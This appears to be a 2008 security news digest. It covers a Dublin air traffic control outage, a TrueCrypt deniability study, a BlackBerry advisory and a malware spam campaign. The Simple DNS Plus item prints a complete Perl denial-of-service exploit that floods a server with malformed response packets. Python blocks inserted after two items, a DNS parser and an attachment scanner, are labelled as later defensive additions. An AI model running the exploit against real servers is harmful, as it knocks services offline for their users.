
    Network card crashes Dublin air traffic control

    July 19th, 2008


    The airport was shut on Wednesday after ATC periodically lost plane tracking for up to ten minutes at a time. Flights had to be rerouted across Europe, causing massive delays.

    The problem has been traced to a faulty network card that caused the system, built by Thales, to overload.

    “Thales ATM confirmed the root cause of the hardware system malfunction as an intermittent malfunctioning network card which consequently overcame the built-in system redundancy,” said the Irish Aviation Authority in a statement.

    “Thales ATM also confirmed that the cause of the malfunction was the same for previous malfunctions which had occurred since 2 June, 2008. Thales ATM stated that in ten similar Air Traffic Control Centres worldwide with over 500,000 flight hours (50 years), this is the first time an incident of this type has been reported.”

    The radar system had been suffering problems for some time and the airport was allowing fewer planes to take off and land because of fears about the radar system.

    On Wednesday at around 2pm ATC lost all height and location information on flights and ordered aircraft into a holding pattern before dispersing them to other landing spots.

    Dublin is Ireland’s busiest airport and the shutdown caused serious disruption to passengers, and particularly to Aer Lingus and Ryanair, who base many of their services there.


    Simple DNS Plus Denial of Service

    July 19th, 2008

    A vulnerability in the way Simple DNS Plus handles incoming DNS queries allows a remote attacker to cause the product to fail by sending it a malformed DNS request.

    Vulnerable Systems:
    * Simple DNS Plus version 5.0
    * Simple DNS Plus version 4.1

    Exploit:
    #!/usr/bin/perl
    # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
    #
    # usage: sdns-dos.pl <dns server> <dns source port> <num of packets>
    # Exploit written by Exodus.
    # http://www.blackhat.org.il

    use IO::Socket;

    if(@ARGV < 3){
        print("sdns-dos.pl <dns server> <dns source port> <num of packets>\n");
        exit(1);
    }
    $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'udp') || die("Cant connect DNS server");

    $address = $ARGV[0];

    # DNS header: transaction ID, flags (QR bit set, i.e. a response) and the four section counts
    $trans = pack("H4","1337");
    $flags = pack("B16","1000010110110000");
    $question = pack("H4","0001");
    $answerRR = pack("H4","0001");
    $authorityRR = pack("H4","0000");
    $additionlRR = pack("H4","0000");
    $type = pack("H4","0001"); # A host name
    $class = pack("H4","0001"); # IN

    # Question name: the server address encoded as length-prefixed labels
    @parts = split(/\./,$address);
    foreach $part (@parts)
    {
        $packedlen = pack("H2",sprintf("%02x",length($part)));
        $address2 .= $packedlen.$part;
    }
    $query = $address2. "\000" . $type . $class;

    # Answer RR whose name is a compression pointer (0xc00c) back to the question name
    $aname = pack("H4","c00c");
    $atype = pack("H4","0001");
    $aclass = pack("H4","0001");
    $ttl = pack("H8","0000008d");
    $dlen = pack("H4","0004");
    $addr = inet_aton("127.0.0.1");
    $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;

    $payload = $trans . $flags . $question . $answerRR
    . $authorityRR . $additionlRR . $query . $answer;

    print "sending $ARGV[2] packets ";
    for($i=0;$i<=$ARGV[2];$i++)
    {
        print $sock $payload;
    }
    print "Done. Good bye.";
    __END__
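    The script above delivers a DNS message with the response bit set, one question, and one answer whose name is a compression pointer back into the question, to a server's query port. As an added defensive example (not part of the original post and not written by the exploit's author), the Python below is a bounds-checked parser for the RFC 1035 wire format plus a triage function a server could run on every datagram before doing any real work: truncated sections, RDATA that overruns the message, and forward or self-referencing compression pointers are rejected, and a response-flagged message arriving where only queries are expected is dropped. The sample packets are constructed in the code and use example.com rather than the server's own address; the hop limit and the triage rules are my assumptions, not anything taken from Simple DNS Plus.

```python
import struct

# Added example (not from the original post or the exploit's author): a
# bounds-checked DNS wire-format parser and a per-datagram triage function.

HEADER = struct.Struct("!HHHHHH")   # id, flags, qdcount, ancount, nscount, arcount
MAX_POINTER_HOPS = 16                # assumed limit; RFC 1035 only requires "prior occurrence"


class DnsParseError(ValueError):
    """Raised for truncated messages, bad labels or hostile compression pointers."""


def read_name(data: bytes, offset: int):
    """Decode a domain name at `offset`; return (dotted_name, offset_after_name).

    Compression pointers must point strictly backwards, so a loop is impossible;
    the hop limit is only a second line of defence.
    """
    labels = []
    end = None          # where the caller continues reading (fixed at the first pointer)
    hops = 0
    while True:
        if offset >= len(data):
            raise DnsParseError("name runs past end of message")
        length = data[offset]
        if length & 0xC0 == 0xC0:                       # 11xxxxxx: compression pointer
            if offset + 1 >= len(data):
                raise DnsParseError("truncated compression pointer")
            pointer = struct.unpack_from("!H", data, offset)[0] & 0x3FFF
            if pointer >= offset:
                raise DnsParseError("forward or self-referencing compression pointer")
            hops += 1
            if hops > MAX_POINTER_HOPS:
                raise DnsParseError("too many compression hops")
            if end is None:
                end = offset + 2
            offset = pointer
            continue
        if length & 0xC0:                               # 01/10 prefixes are reserved
            raise DnsParseError("reserved label type")
        offset += 1
        if length == 0:                                 # root label terminates the name
            break
        if offset + length > len(data):
            raise DnsParseError("label runs past end of message")
        labels.append(data[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), (offset if end is None else end)


def parse_dns_message(data: bytes) -> dict:
    """Parse header, questions and all resource records with bounds checks."""
    if len(data) < HEADER.size:
        raise DnsParseError("shorter than 12-byte header")
    txid, flags, qdcount, ancount, nscount, arcount = HEADER.unpack_from(data, 0)
    offset = HEADER.size
    questions = []
    for _ in range(qdcount):
        name, offset = read_name(data, offset)
        if offset + 4 > len(data):
            raise DnsParseError("truncated question")
        qtype, qclass = struct.unpack_from("!HH", data, offset)
        offset += 4
        questions.append((name, qtype, qclass))
    records = []
    for _ in range(ancount + nscount + arcount):
        name, offset = read_name(data, offset)
        if offset + 10 > len(data):
            raise DnsParseError("truncated resource record header")
        rtype, rclass, ttl, rdlength = struct.unpack_from("!HHIH", data, offset)
        offset += 10
        if offset + rdlength > len(data):
            raise DnsParseError("RDATA length exceeds message")
        records.append((name, rtype, rclass, ttl, data[offset:offset + rdlength]))
        offset += rdlength
    return {
        "id": txid,
        "is_response": bool(flags & 0x8000),
        "opcode": (flags >> 11) & 0xF,
        "rcode": flags & 0xF,
        "questions": questions,
        "records": records,
        "trailing_bytes": len(data) - offset,
    }


def server_should_drop(data: bytes):
    """Triage for a datagram on a server's query port; returns (drop, reason)."""
    try:
        msg = parse_dns_message(data)
    except DnsParseError as exc:
        return True, f"malformed: {exc}"
    if msg["is_response"]:
        return True, "QR bit set: a response is not a query"
    if msg["opcode"] == 0 and len(msg["questions"]) != 1:
        return True, "standard query must carry exactly one question"
    return False, "ok"


def build_sample_query() -> bytes:
    """Constructed: an ordinary A query for example.com."""
    name = b"\x07example\x03com\x00"
    return HEADER.pack(0x1234, 0x0100, 1, 0, 0, 0) + name + struct.pack("!HH", 1, 1)


def build_sample_response() -> bytes:
    """Constructed: response flags 0x85B0, one question, one answer whose name is
    the pointer 0xC00C back to the question name, TTL 0x8D, 4-byte RDATA."""
    name = b"\x07example\x03com\x00"
    header = HEADER.pack(0x1337, 0x85B0, 1, 1, 0, 0)
    question = name + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 0x8D, 4) + bytes([127, 0, 0, 1])
    return header + question + answer


if __name__ == "__main__":
    for label, pkt in [("query", build_sample_query()),
                       ("response", build_sample_response()),
                       ("truncated", build_sample_response()[:-2])]:
        print(label, server_should_drop(pkt))
```

    The parser returns after every section with the offset it consumed, so the caller can also see `trailing_bytes`; a non-zero value on a query socket is worth logging even when the message itself decodes cleanly.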


    Vista, Word and Google Desktop circumvent TrueCrypt function

    July 17th, 2008

    Cryptography expert Bruce Schneier, in conjunction with a research group, has studied the security of TrueCrypt, to see whether it meets the specifications for a ‘Deniable File System’ (DFS) – implemented in TrueCrypt as hidden volumes – and is really able to conceal the existence of a volume within a standard system environment.

    Hidden volumes are intended to conceal even the existence of encrypted files. This allows a PC owner to deny having specific encrypted data on his PC. Even where a suspect in a police investigation reveals the key to an outer container in order to avoid a jail term, he or she can still deny the existence of a concealed inner container. This is known as deniable encryption. For the authorities, the only solution to this would be to make the private use of encryption itself illegal.

    Whilst TrueCrypt 5.1a itself appears to offer few points of attack, Windows Vista, Word and Google Desktop all undermine the principle of deniability. As soon as a user opens a hidden volume, traces, such as a unique volume ID, are left in the Windows registry. In addition, an edited file may subsequently appear in the list of recently opened documents.

    According to Schneier, Word can torpedo both encryption and deniability if auto-save is activated. Using simple Word auto-recovery tools, he succeeded in recovering a Word file edited in a hidden folder. Google Desktop, which indexes many data types as soon as a volume is opened, can have similarly fatal consequences.

    Some of these problems have already been addressed in TrueCrypt 6.0. This allows the entire operating system to be hidden in an inner container. Depending on the password entered by the user when booting, either the encrypted system alone or both the encrypted system and the hidden system will start. It is then irrelevant whether or not the operating system or another application leaves traces of the hidden system.

    Schneier’s group intend to present their results at USENIX HotSec ‘08 at the end of this month. The seven-page paper is already available as a PDF.


    BlackBerry Attachment Service PDF Distiller Remote Code Execution Vulnerability

    July 17th, 2008

    Description:

    BlackBerry Attachment Service is a component of BlackBerry Enterprise Server and BlackBerry Unite! that is used to process email attachments.

    BlackBerry Enterprise Server provides a wireless connectivity platform for sending and receiving a variety of data from wireless devices such as smartphones.

    BlackBerry Unite! is a personal networking application for BlackBerry users.

    BlackBerry Attachment Service is prone to a remote code-execution vulnerability that occurs when the PDF distiller component of the service processes specially crafted PDF files.

    Attackers can leverage this issue to execute arbitrary machine code in the context of applications running the service. Successful exploits will compromise the server. Failed attacks will likely result in denial-of-service conditions.

    This issue affects the following:

    BlackBerry Enterprise Server 4.1.3 through 4.1.5
    BlackBerry Unite! prior to 1.0.1 bundle 36.

    Affected Products:

    • BlackBerry Enterprise Server 4.1.3
    • BlackBerry Enterprise Server 4.1.4
    • BlackBerry Enterprise Server 4.1.5
    • BlackBerry Unite! 1.0.1


    Spammers tout ‘nude’ Angelina Jolie pix

    July 17th, 2008

    Antivirus experts have warned of a new wave of spam messages that use fake events related to Angelina Jolie in order to trick users into downloading and installing malware.

    Researchers at Romanian firm BitDefender said that this latest campaign is mostly carried via spam messages based around alleged adult video footage of the movie star.

    In order to watch the ‘movie’, users have to download a file called ‘video-nude-anjelina.avi.exe’ which is infected with Trojan.Agent.AGGZ.

    The spam message comprises an explicit image of Jolie, along with text claiming that the email has been sent as part of the MSN Featured Offers programme.

    The message attempts to play a double role by trying to trick the user into thinking that this is a legitimate news message and by preventing spam filters from labelling the entire email as spam.

    “The spam wave is part of a larger category of unsolicited messages that rely on social engineering techniques in order to lure unwary users into installing Trojans,” said Vlad Valceanu, head of BitDefender anti-spam research.

    “This type of attack seems to be extremely successful, as the number of messages has quickly escalated over the last couple months.

    “In order to achieve their goals, spammers usually rely on international celebrities and their pictures, along with catchy yet fake news leads.”

    This is not the only incident involving Jolie. The actress recently gave birth to two children, and spammers took advantage of the event in order to infect more computers.

    The spam campaign following the event announced that Jolie gave birth to no fewer than five children, and even offered users a link to a website allegedly hosting a small video of the event.

    Once on the respective page, users were shown an image masquerading as a Flash video player.

    But when the user landed on the compromised webpage, the download started immediately without any user intervention - a procedure also known as drive-by download.

    The binary file was infected with Trojan.Downloader.Exchanger.Gen.1, a piece of malware that has been widely used in another spam campaign promoting an alleged antivirus utility called Antivirus XP 2008.
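    The lure in the first campaign depends on a file named ‘video-nude-anjelina.avi.exe’ reading as a video while actually being an executable. As an added example, not part of the original article or BitDefender's work, the Python below parses a raw e-mail with the standard library and flags attachments that use that disguise: an executable final extension behind a media-looking inner extension, content beginning with the PE ‘MZ’ header, or a declared video/image type that does not match the content. The sample message, its addresses and the attachment bytes are constructed here; the extension lists are my assumptions about what a mail gateway would treat as executable or media.

```python
import email
from email import policy
from email.message import EmailMessage

# Added example, not from the original article or BitDefender: flag attachments
# that dress an executable up as a media file.

EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "jar"}  # assumed list
MEDIA_EXTS = {"avi", "mpg", "mpeg", "mp4", "wmv", "mov", "jpg", "jpeg", "gif", "png"}  # assumed list
PE_MAGIC = b"MZ"      # first two bytes of a DOS/PE executable


def suspicious_attachment_reasons(filename: str, payload: bytes, declared_type: str):
    """Return the reasons an attachment looks like a disguised executable
    (an empty list means nothing suspicious was found)."""
    reasons = []
    parts = filename.lower().split(".")
    final_ext = parts[-1] if len(parts) > 1 else ""
    inner_exts = parts[1:-1]
    if final_ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{final_ext}")
        if any(ext in MEDIA_EXTS for ext in inner_exts):
            reasons.append("media-looking inner extension hides the real type")
    if payload.startswith(PE_MAGIC):
        reasons.append("content starts with the PE 'MZ' header")
    if declared_type.split("/")[0] in ("video", "image", "audio") and (
            final_ext in EXECUTABLE_EXTS or payload.startswith(PE_MAGIC)):
        reasons.append(f"declared {declared_type} but carries executable content")
    return reasons


def scan_message(raw: bytes):
    """Parse a raw RFC 5322 message and return [(filename, reasons)] for every
    attachment that trips at least one check."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        reasons = suspicious_attachment_reasons(filename, payload, part.get_content_type())
        if reasons:
            findings.append((filename, reasons))
    return findings


def build_sample_message() -> bytes:
    """Constructed sample: a lure text, a harmless JPEG, and a PE executable
    named like a video clip (the filename is the one quoted in the article)."""
    msg = EmailMessage()
    msg["From"] = "offers@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "MSN Featured Offers: exclusive video"
    msg.set_content("Watch the clip attached to this message.")
    msg.add_attachment(b"\xff\xd8\xff\xe0" + b"\x00" * 16,
                       maintype="image", subtype="jpeg", filename="preview.jpg")
    msg.add_attachment(b"MZ" + b"\x90" * 62,
                       maintype="video", subtype="x-msvideo",
                       filename="video-nude-anjelina.avi.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reasons in scan_message(build_sample_message()):
        print(name)
        for reason in reasons:
            print("  -", reason)
```

    Checking the first bytes of the decoded payload matters more than the filename: the extension check catches the double-extension lure, but the magic-byte check still fires when the attacker renames the file to something that does not end in a known executable extension.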